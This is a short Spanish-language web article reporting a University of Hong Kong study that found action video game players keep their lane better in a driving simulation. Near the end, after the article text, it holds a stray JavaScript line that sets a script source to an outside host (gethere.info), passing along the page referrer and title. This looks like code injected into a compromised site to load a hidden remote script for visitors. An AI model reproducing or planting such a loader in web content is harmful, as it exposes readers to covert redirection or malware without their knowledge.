Jugar Mario Kart definitivamente te hace un mejor conductor

Las horas que pasas jugando Nintendo pueden no ser una pérdida de tiempo total: Los juegos de video realmente pueden mejorar tus habilidades de conducción, una nueva investigación de la Universidad de Hong Kong lo ha comprobado.

En el estudio, las personas que han jugado videojuegos de acción como Counter-Strike o Call of Duty durante al menos 5 horas a la semana tienen mejores habilidades al conducir a diferencia de los jugadores que participan en una simulación de conducción donde tuvieron que luchar contra obstáculos por un camino lleno de baches.


En un término medio, los jugadores de videojuegos se desviaron del centro de sus carriles un 57 por ciento menos que los que no son jugadores.

Esto se debe a que los videojuegos requieren que se realice respuestas precisas y rápidas con las manos para reaccionar ante lo que se ve en la pantalla, dice el coautor del estudio Li Li, Ph.D.

Mario Kart, puede significar un buen entrenamiento ya que presionas los botones para esquivar las cáscaras de plátano, pero el sistema utiliza su cerebro para hacerlo de la misma manera que se usa con un volante cuando se aproxima a una curva en la carretera. Jugar videojuegos agudiza esa parte de tu cerebro, mejorando la capacidad para reaccionar cuando se conduce un coche real, dice Li.

No vamos a sugerir empezar a jugar Nintendo durante cinco horas a la semana. Pero si ya tienes un hábito jugando Halo, considera esto una nueva excusa útil: ya que no es perder el tiempo, tómalo como que estás tomando clases de manejo.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:
Comentarios